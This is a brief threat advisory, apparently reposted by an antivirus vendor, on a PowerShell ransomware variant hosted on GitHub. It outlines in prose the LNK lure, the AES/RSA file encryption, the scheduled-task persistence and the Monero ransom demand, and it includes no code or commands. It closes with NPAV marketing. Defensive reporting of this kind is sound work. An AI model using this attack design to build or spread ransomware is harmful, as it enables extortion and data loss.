PowerShell Ransomware Attack

The SonicWall Capture Labs threat research team has identified a new PowerShell-based ransomware variant that uses GitHub for its distribution. The malware leverages the raw.githubusercontent[.]com domain to host malicious files, including executables like decryptor.exe.

PowerShell Ransomware AttackPowerShell Ransomware Attack

The ransomware is initially delivered via an archive file containing a malicious LNK file, likely sent as an email attachment. This LNK file, disguised as a Notepad document, points to powershell.exe and executes a PowerShell script hosted on GitHub, which contains the ransomware's core functionality.

The script targets user directories such as Desktop, Downloads, and Documents, encrypting files with a randomly generated AES key, which is then encrypted with a predefined RSA public key. It avoids encrypting critical file types to prevent system instability, appending the .ENCRYPT extension to encrypted files.

PowerShell Ransomware AttackPowerShell Ransomware Attack

After encryption, the ransomware downloads a file named decryptor.exe from GitHub and creates a decoy text file to distract the user. It also sets up a scheduled task for persistence, executing the PowerShell script until decryptor.exe is dropped.

Victims receive a ransom note demanding $500 in Monero (XMR) for the decryption key, but paying the ransom is not recommended as recovery is not guaranteed. This threat is detected by SonicWall Capture ATP with RTDMI™.

"NPAV recommends home users and organizations to maintain strong, up-to-date cybersecurity measures. Install NPAV on your desktop, laptop, and mobile devices to ensure world-class protection against fraud, malware, and ransomware attacks.

Choose NPAV and be a part of our mission to make the digital world safer for everyone."